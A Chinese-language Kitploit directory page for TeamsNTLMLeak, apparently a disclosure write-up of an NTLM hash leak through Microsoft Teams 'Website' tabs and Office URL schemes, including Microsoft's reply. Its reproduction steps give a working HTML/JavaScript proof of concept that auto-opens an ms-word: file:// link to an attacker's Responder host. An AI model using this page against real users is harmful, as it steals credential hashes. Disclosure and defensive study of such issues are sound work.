Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TeamsNTLMLeak — 通过 MS Office 在 Teams 的"网站"标签页中泄露 NTLM | Kitploit
工具/GitHubGitHub/soufianetahiri/teamsntlmleak
密码攻击漏洞利用信息收集钓鱼攻击社会工程学红队对抗性攻击
GitHubsoufianetahiri/teamsntlmleak

TeamsNTLMLeak

通过 MS Office 在 Teams 的"网站"标签页中泄露 NTLM

查看仓库
80952年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

当用户导航到一个“网站”选项卡,该选项卡指向一个特制网页时,可能会导致通过激活 Office URL 方案泄露 NTLM 哈希,从而将该过程简化为单次点击即可泄露。

如果用户尝试从浏览器打开格式为 ms-word:ofv|u|file://Share/File.docx 的链接,需要以下步骤:

1- 用户必须确认其打开 Word 的意图。

2- 用户必须确认并接受 MS Office 警告消息中所示的风险。

然而,在“网站”选项卡上,用户的操作被简化为仅需接受风险。

复现步骤

  1. 在“攻击者”机器上运行 Responder
  2. 托管一个包含以下代码的 HTML 页面:
root@kitploit:~
<html>
<head>
    <title>Auto Open Document</title>
</head>
<body>
    <a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
    <script>
        window.onload = function() {
            document.getElementById('autoOpenLink').click();
        };
    </script>
</body>
</html>

3. 在 Teams 中,设置一个指向你刚刚搭建的网页的“网站”选项卡。 4. 访问该“选项卡”。

当你访问该选项卡时,一个由 JavaScript 触发的链接会自动启动打开 Word。如果用户通过点击“是”同意 Word 中的提示,他们的 NTLM 哈希将被传输到“攻击者”的机器。

演示

PoC

披露

2024年3月27日(周三)20:23,Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])> 写道:
你好,
感谢你的提交。我们认定你的发现是有效的,但因其严重性较低,尚不符合立即处理的标准。我们的工程师指出,用户在 Word 或其他 Office 客户端中仍需同意后 NTLM 才会泄露,这降低了严重性。不过,我们已将你的发现标记为未来审查项,作为改进我们产品的机会,并作为一个待改进的功能问题。目前我没有该审查的时间表。由于此时无需进一步操作,我将关闭此案例。
此致,
MSRC

看起来已在 Microsoft Teams 版本 24033.813.2773.520. 中修复。

下载工具